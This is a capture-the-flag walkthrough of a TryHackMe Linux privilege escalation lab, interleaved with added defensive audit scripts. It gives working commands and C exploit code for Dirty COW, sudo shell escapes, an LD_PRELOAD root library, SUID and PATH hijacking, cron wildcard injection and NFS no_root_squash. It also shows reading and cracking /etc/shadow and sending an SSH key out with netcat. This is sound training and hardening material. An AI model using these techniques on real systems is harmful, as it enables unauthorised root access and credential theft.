Linux PrivEsc Arena

Room Link: https://tryhackme.com/room/linuxprivescarena

Privilege Escalation - Kernel Exploits

In command prompt type:

Victim

/home/user/tools/linux-exploit-suggester/linux-exploit-suggester.sh

From the output, notice that the OS is vulnerable to “dirtycow”.

Exploitation

Linux VM

In command prompt type:

Victim

gcc -pthread /home/user/tools/dirtycow/c0w.c -o c0w

In command prompt type:

Victim

./c0w

Disclaimer: this part takes 1-2 minutes, so allow it some time to work.

In command prompt type:

Victim

passwd

In command prompt type:

Victim

id

From here, either copy /tmp/passwd back to /usr/bin/passwd or reset your machine to undo the changes made to the passwd binary.

Victim

ls -lah /usr/bin/passwd
rm -f /usr/bin/passwd
cp /tmp/bak /usr/bin/passwd
ls -lah /usr/bin/passwd

Privilege Escalation - Stored Passwords (Config Files)

Victim

cat /home/user/myvpn.ovpn

From the output, make note of the value of the “auth-user-pass” directive.

Victim

cat /etc/openvpn/auth.txt

From the output, make note of the clear-text credentials.

Victim

cat /home/user/.irssi/config | grep -i passw

From the output, make note of the clear-text credentials.

Privilege Escalation - Stored Passwords (History)

Victim

cat ~/.bash_history | grep -i passw

From the output, make note of the clear-text credentials.
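The two sections above boil down to one defensive check: which files on the host contain a credential-like line, and who can read them. The script below is an added example (not part of the room) that does that check over files it constructs itself in a temp directory; the function names (cred_lines, cred_hit_count, world_readable, report) and the sample contents are assumptions made for the example, and the permission check relies on GNU stat.

```shell
#!/bin/sh
# Added example: flag credential-bearing lines in config files and shell
# history, and report whether other local users can read them. Every file
# below is constructed in a temp dir; nothing is read from the real system.

DEMO=$(mktemp -d)
cat > "$DEMO/myvpn.ovpn" <<'EOF'
client
remote vpn.example.test 1194
auth-user-pass /etc/openvpn/auth.txt
EOF
cat > "$DEMO/irssi.config" <<'EOF'
servers = (
  { address = "irc.example.test"; password = "ConstructedSample1"; }
);
EOF
cat > "$DEMO/bash_history" <<'EOF'
ls -la
mysql -u admin --password=ConstructedSample2
EOF
printf 'nothing sensitive here\n' > "$DEMO/notes.txt"
chmod 644 "$DEMO/myvpn.ovpn" "$DEMO/bash_history"   # constructed: readable by everyone
chmod 600 "$DEMO/irssi.config" "$DEMO/notes.txt"    # constructed: owner only

# cred_lines FILE... : print "file:line:text" for lines that name a password
# or an OpenVPN auth-user-pass directive (the same strings the room greps for)
cred_lines() {
    for f in "$@"; do
        if [ -f "$f" ]; then
            grep -H -n -i -E 'auth-user-pass|passw' "$f" || true
        fi
    done
}

# cred_hit_count FILE... : number of credential lines across the given files
cred_hit_count() { cred_lines "$@" | wc -l | tr -d ' '; }

# world_readable FILE : succeed if the "other" read bit is set (GNU stat,
# -L so a symlink is judged by its target)
world_readable() {
    case $(stat -L -c '%a' "$1" 2>/dev/null) in
        *[4567]) return 0 ;;
        *)       return 1 ;;
    esac
}

# report FILE... : one line per file that holds credentials, with its exposure
report() {
    for f in "$@"; do
        if [ "$(cred_hit_count "$f")" != "0" ]; then
            if world_readable "$f"; then exposure=world-readable; else exposure=owner-only; fi
            printf '%s: %s credential line(s), %s\n' "$f" "$(cred_hit_count "$f")" "$exposure"
        fi
    done
}

report "$DEMO/myvpn.ovpn" "$DEMO/irssi.config" "$DEMO/bash_history" "$DEMO/notes.txt"
```

Run against real paths, the world-readable hits are the ones to fix first: move the secret into a root-owned file with mode 600 (OpenVPN's auth-user-pass already supports pointing at a separate file) and clear or restrict the history file. Matching on "passw" is deliberately broad; expect to review false positives.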

Privilege Escalation - Weak File Permissions

Victim

cat /etc/passwd

Save the output to a file on your attacker machine

Victim

cat /etc/shadow

Save the output to a file on your attacker machine

Kali

unshadow passwd shadow > unshadowed.txt
hashcat -m 1800 unshadowed.txt rockyou.txt -O
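The offline cracking step only works because /etc/shadow was readable and because the hashes are of a type hashcat can attack quickly (-m 1800 is sha512crypt; md5crypt and DES are far weaker). The script below is an added example, not part of the room, that audits constructed stand-ins for /etc/passwd and /etc/shadow for exactly those conditions: shadow permissions, hashes left in the passwd file, and legacy hash types. The function names and placeholder hashes are assumptions made for the example; the permission check relies on GNU stat.

```shell
#!/bin/sh
# Added example: audit the account database for the weaknesses the room
# exploits. Both files are constructed in a temp dir with placeholder hashes.

DEMO=$(mktemp -d)
cat > "$DEMO/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
user:x:1000:1000:user:/home/user:/bin/bash
oldsvc:$1$CONSTRUCTED$placeholderhashvalue:1001:1001::/var/lib/oldsvc:/bin/false
EOF
cat > "$DEMO/shadow" <<'EOF'
root:$6$CONSTRUCTED$placeholdersha512cryptvalue:18000:0:99999:7:::
user:$1$CONSTRUCTED$placeholdermd5cryptvalue:18000:0:99999:7:::
daemon:*:18000:0:99999:7:::
svc:!:18000:0:99999:7:::
EOF
chmod 644 "$DEMO/shadow"   # constructed weakness: readable by every local user

# shadow_exposed FILE : succeed if any permission bit is set for "other"
shadow_exposed() {
    case $(stat -L -c '%a' "$1" 2>/dev/null) in
        *[1-7]) return 0 ;;
        *)      return 1 ;;
    esac
}

# passwd_hash_entries FILE : users whose passwd field holds a real hash rather
# than the "x" that defers to /etc/shadow (passwd is world-readable by design)
passwd_hash_entries() {
    awk -F: '$2 != "x" && $2 != "" && $2 !~ /^[!*]/ { print $1 }' "$1"
}

# shadow_legacy_hashes FILE : users whose hash is not sha512crypt ($6$),
# yescrypt ($y$) or bcrypt ($2*$); locked (!/*) and empty fields are skipped
shadow_legacy_hashes() {
    awk -F: '$2 != "" && $2 !~ /^[!*]/ && $2 !~ /^\$(6|y|2[abxy]?)\$/ { print $1 }' "$1"
}

printf 'shadow readable by others: %s\n' "$(shadow_exposed "$DEMO/shadow" && echo yes || echo no)"
printf 'hashes stored in passwd: %s\n' "$(passwd_hash_entries "$DEMO/passwd" | tr '\n' ' ')"
printf 'legacy hash types in shadow: %s\n' "$(shadow_legacy_hashes "$DEMO/shadow" | tr '\n' ' ')"
```

The fix for an exposed shadow file is mode 640 owned by root:shadow; hashes found in the passwd file should be moved into shadow (pwconv does this), and accounts flagged as legacy should have their password reset so the hash is regenerated with the system's current method.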

Privilege Escalation - SSH Keys

Found nothing for this box

Victim

find / -name authorized_keys 2> /dev/null

Victim

find / -name id_rsa 2> /dev/null
cat /backups/supersecretkeys/id_rsa

Netcat

Kali(receiving)

nc -l -p 1234 > id_rsa

Victim(sending)

nc -w 3 $KALI 1234 < id_rsa

Kali

chmod 400 id_rsa
ssh -i id_rsa root@$VICTIM

Privilege Escalation - Sudo (Shell Escaping)

Victim

sudo -l

Victim

sudo find /bin -name nano -exec /bin/sh \;

Victim

sudo awk 'BEGIN {system("/bin/sh")}'

Victim

echo "os.execute('/bin/sh')" > shell.nse && sudo nmap --script=shell.nse

Victim

sudo vim -c '!sh'

Privilege Escalation - Sudo (Abusing Intended Functionality)

Victim

sudo -l

Victim

sudo apache2 -f /etc/shadow

Kali

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
john hash.txt --show

Privilege Escalation - Sudo (LD_PRELOAD)

Victim

sudo -l

exploit.c

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>   /* setgid(), setuid() */

/* Runs when the library is loaded; the build below uses -nostartfiles so
   this _init takes the place of the default one. */
void _init() {
    unsetenv("LD_PRELOAD");   /* keep the library from loading again in the child */
    setgid(0);
    setuid(0);
    system("/bin/bash");
}

Victim

gcc -fPIC -shared -o /tmp/exploit.so exploit.c -nostartfiles
sudo LD_PRELOAD=/tmp/exploit.so apache2
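The three sudo sections above all start from `sudo -l`, so the natural defensive counterpart is a parser for that output that flags the same things the walkthrough looks for: rules granting binaries that can spawn a shell (find, awk, nmap, vim), rules granting apache2 (which discloses the first line of whatever file -f points at), and an env_keep that preserves LD_PRELOAD. The script below is an added example, not part of the room; SAMPLE_SUDO_L and HARDENED_SUDO_L are constructed text rather than captured output, and the function names are assumptions made for the example.

```shell
#!/bin/sh
# Added example: parse `sudo -l` output for the patterns the sudo sections
# rely on. Both samples are constructed, not output captured from the room.

SAMPLE_SUDO_L='Matching Defaults entries for user on this host:
    env_reset, env_keep+=LD_PRELOAD

User user may run the following commands on this host:
    (root) NOPASSWD: /usr/bin/find
    (root) NOPASSWD: /usr/bin/awk
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/bin/vim
    (root) NOPASSWD: /usr/sbin/apache2
    (root) NOPASSWD: /bin/ls'

HARDENED_SUDO_L='Matching Defaults entries for user on this host:
    env_reset

User user may run the following commands on this host:
    (root) NOPASSWD: /usr/sbin/service apache2 restart'

# Binaries from the walkthrough: the first group can start a shell from inside
# the program; apache2 reports the first line of any file given to -f.
SHELL_ESCAPE_BINS='find awk nmap vim'
FILE_READ_BINS='apache2'

# sudo_flag_rules TEXT : print "kind path" for each rule whose command (the
# first absolute path on the line) is in one of the lists above
sudo_flag_rules() {
    printf '%s\n' "$1" | awk -v esc="$SHELL_ESCAPE_BINS" -v rd="$FILE_READ_BINS" '
        BEGIN {
            n = split(esc, a, " "); for (i = 1; i <= n; i++) E[a[i]] = 1
            n = split(rd, b, " ");  for (i = 1; i <= n; i++) R[b[i]] = 1
        }
        /^[[:space:]]*\(/ {
            cmd = ""
            for (i = 2; i <= NF; i++) if ($i ~ /^\//) { cmd = $i; break }
            if (cmd == "") next
            base = cmd; sub(/.*\//, "", base)
            if (base in E) print "shell-escape " cmd
            else if (base in R) print "file-read " cmd
        }'
}

# sudo_keeps_ld_preload TEXT : succeed if env_keep preserves LD_PRELOAD, which
# lets any permitted command load a caller-chosen shared object as root
sudo_keeps_ld_preload() {
    printf '%s\n' "$1" | grep -q -E 'env_keep[[:space:]]*\+?=.*LD_PRELOAD'
}

echo "== sample rules =="
sudo_flag_rules "$SAMPLE_SUDO_L"
sudo_keeps_ld_preload "$SAMPLE_SUDO_L" && echo "env_keep preserves LD_PRELOAD"
echo "== hardened rules =="
sudo_flag_rules "$HARDENED_SUDO_L"
sudo_keeps_ld_preload "$HARDENED_SUDO_L" || echo "LD_PRELOAD is reset"
```

The hardened sample shows the shape of the fix: grant one specific command line rather than a general-purpose binary, and keep the default env_reset without adding LD_PRELOAD (or any LD_* variable) to env_keep. The lists here only contain the four binaries the room uses; a production check would carry a longer list of programs with known shell escapes.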

Privilege Escalation - SUID (Shared Object Injection)

Victim

find / -type f -perm -04000 -ls 2>/dev/null

Victim

strace /usr/local/bin/suid-so 2>&1 | grep -i -E "open|access|no such file"

Victim

mkdir /home/user/.config
cd /home/user/.config
vi libcalc.c

libcalc.c

#include <stdio.h>
#include <stdlib.h>

/* constructor attribute: runs automatically when the library is loaded */
static void inject() __attribute__((constructor));

static void inject() {
    system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}

Victim

gcc -shared -o /home/user/.config/libcalc.so -fPIC /home/user/.config/libcalc.c
/usr/local/bin/suid-so

Privilege Escalation - SUID (Symlinks)

Victim #1

dpkg -l | grep nginx

Victim #1

su -l www-data

Victim #1

/home/user/tools/nginx/nginxed-root.sh /var/log/nginx/error.log

Victim #2

invoke-rc.d nginx rotate >/dev/null 2>&1

Victim #1

id

Privilege Escalation - SUID (Environment Variables #1)

Detection

Victim

find / -type f -perm -04000 -ls 2>/dev/null

Victim

strings /usr/local/bin/suid-env

Exploitation

Victim

printf '%s\n' '#include <stdlib.h>' '#include <unistd.h>' 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/service.c

Victim

gcc /tmp/service.c -o /tmp/service
export PATH=/tmp:$PATH
/usr/local/bin/suid-env

Victim

id

Privilege Escalation - SUID (Environment Variables #2)

Detection

Victim

find / -type f -perm -04000 -ls 2>/dev/null

Victim

/usr/local/bin/suid-env2

Exploitation Method #1

Victim

function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }

Victim

export -f /usr/sbin/service

Victim

/usr/local/bin/suid-env2

Exploitation Method #2

Victim

env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +s /tmp/bash)' /bin/sh -c '/usr/local/bin/suid-env2; set +x; /tmp/bash -p'

Privilege Escalation - Capabilities

Victim

getcap -r / 2>/dev/null

Victim

/usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'
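Every SUID section above starts from the same `find / -perm -04000` listing, and the capabilities section from `getcap -r /`; the defensive version is to run those two inventories regularly and flag the entries that matter. The script below is an added example, not part of the room: it lists setuid files under a directory tree it constructs in a temp dir, and flags getcap lines whose effective set includes a capability that allows identity changes or kernel-level control. The function names, DANGEROUS_CAPS list and SAMPLE_GETCAP text are assumptions made for the example; the parser accepts both the older `path = caps` and the newer `path caps` getcap layouts.

```shell
#!/bin/sh
# Added example: inventory setuid files and dangerous file capabilities. The
# directory tree is constructed in a temp dir; the getcap text is a sample.

DEMO=$(mktemp -d)
mkdir -p "$DEMO/bin"
printf '#!/bin/sh\n' > "$DEMO/bin/suid-env"
printf '#!/bin/sh\n' > "$DEMO/bin/plain"
chmod 4755 "$DEMO/bin/suid-env"   # constructed: setuid bit set
chmod 755 "$DEMO/bin/plain"

SAMPLE_GETCAP='/usr/bin/ping = cap_net_raw+ep
/usr/bin/python2.6 = cap_setuid+ep
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+eip
/usr/bin/perl = cap_sys_admin+ep
/usr/bin/inheritonly = cap_setuid+i
/usr/bin/python3 cap_setuid=ep'

# list_suid DIR : files under DIR with the setuid bit (the room's find test)
list_suid() { find "$1" -type f -perm -4000 2>/dev/null | sort; }

# Capabilities that let a process change identity or bypass kernel checks
DANGEROUS_CAPS='cap_setuid|cap_setgid|cap_sys_admin|cap_dac_override|cap_dac_read_search|cap_sys_ptrace|cap_sys_module'

# flag_caps TEXT : paths whose *effective* set (the letters after + or =)
# includes one of DANGEROUS_CAPS; inheritable-only grants are not flagged
flag_caps() {
    printf '%s\n' "$1" | awk -v pat="$DANGEROUS_CAPS" '
        NF >= 2 {
            flags = $NF; sub(/.*[+=]/, "", flags)
            if ($0 ~ pat && flags ~ /e/) print $1
        }'
}

echo "== setuid files under $DEMO =="
list_suid "$DEMO"
echo "== dangerous effective capabilities =="
flag_caps "$SAMPLE_GETCAP"
```

Anything list_suid reports that is not owned by a package, or is a script wrapper like the room's suid-env, is a review item; the fix for the environment-variable cases is to call helper programs by absolute path and reset the environment before exec, or to drop the setuid bit (`chmod u-s`). For flagged capabilities, `setcap -r` removes the grant; an interpreter should never carry cap_setuid, since that is equivalent to a setuid-root copy of it.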

Privilege Escalation - Cron (Path)

Detection

Victim

cat /etc/crontab

Exploitation

Victim

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh
chmod +x /home/user/overwrite.sh

Wait 1 minute for the Bash script to execute.

Victim

/tmp/bash -p
id

Privilege Escalation - Cron (Wildcards)

Detection

Victim

cat /etc/crontab

From the output, notice the script “/usr/local/bin/compress.sh”.

Victim

cat /usr/local/bin/compress.sh

Exploitation

Victim

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/runme.sh

Victim

touch /home/user/--checkpoint=1
touch /home/user/--checkpoint-action=exec=sh\ runme.sh

Victim

/tmp/bash -p
id

Privilege Escalation - Cron (File Overwrite)

Detection

Victim

cat /etc/crontab

From the output, notice the script “overwrite.sh”.

Victim

ls -l /usr/local/bin/overwrite.sh

From the output, notice the file permissions.

Exploitation

Victim

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /usr/local/bin/overwrite.sh

Wait 1 minute for the Bash script to execute.

Victim

/tmp/bash -p
id

Privilege Escalation - NFS Root Squashing

Detection

Victim

cat /etc/exports

From the output, notice that the “no_root_squash” option is defined for the “/tmp” export.

Exploitation

Kali

showmount -e $VICTIM

Kali

mkdir /tmp/1
mount -o rw,vers=2 10.10.26.171:/tmp /tmp/1

Kali

printf '%s\n' '#include <stdlib.h>' '#include <unistd.h>' 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/1/x.c

Kali

gcc /tmp/1/x.c -o /tmp/1/x
chmod +s /tmp/1/x

Victim

/tmp/x
id
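The whole NFS section hinges on one export option: with no_root_squash, a client that is root stays root on the server's filesystem, so it can plant a setuid-root file in the exported /tmp. The script below is an added example, not part of the room, that finds such exports in a constructed exports file and emits a corrected copy; SAMPLE_EXPORTS and the function names are assumptions made for the example.

```shell
#!/bin/sh
# Added example: find exports that disable root squashing and produce a
# corrected exports file. SAMPLE_EXPORTS is constructed, not the room's file.

SAMPLE_EXPORTS='/tmp *(rw,sync,insecure,no_root_squash,no_subtree_check)
/srv/share 10.0.0.0/24(ro,sync,root_squash)
# comment line, ignored
/backup *(rw,no_root_squash)'

# exports_no_root_squash TEXT : path of every export whose option list
# contains no_root_squash (client uid 0 is not mapped to nobody)
exports_no_root_squash() {
    printf '%s\n' "$1" | awk '!/^[[:space:]]*(#|$)/ && /\([^)]*no_root_squash[^)]*\)/ { print $1 }'
}

# exports_hardened TEXT : the same exports with root squashing re-enabled
exports_hardened() {
    printf '%s\n' "$1" | sed 's/no_root_squash/root_squash/g'
}

echo "== exports without root squashing =="
exports_no_root_squash "$SAMPLE_EXPORTS"
echo "== corrected exports =="
exports_hardened "$SAMPLE_EXPORTS"
```

After rewriting /etc/exports, `exportfs -ra` applies the change. Root squashing alone does not stop a client from writing ordinary files, so the second layer is to mount the exported directory (and /tmp generally) with nosuid on the server, which makes a planted setuid binary run without privilege even if one is created.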
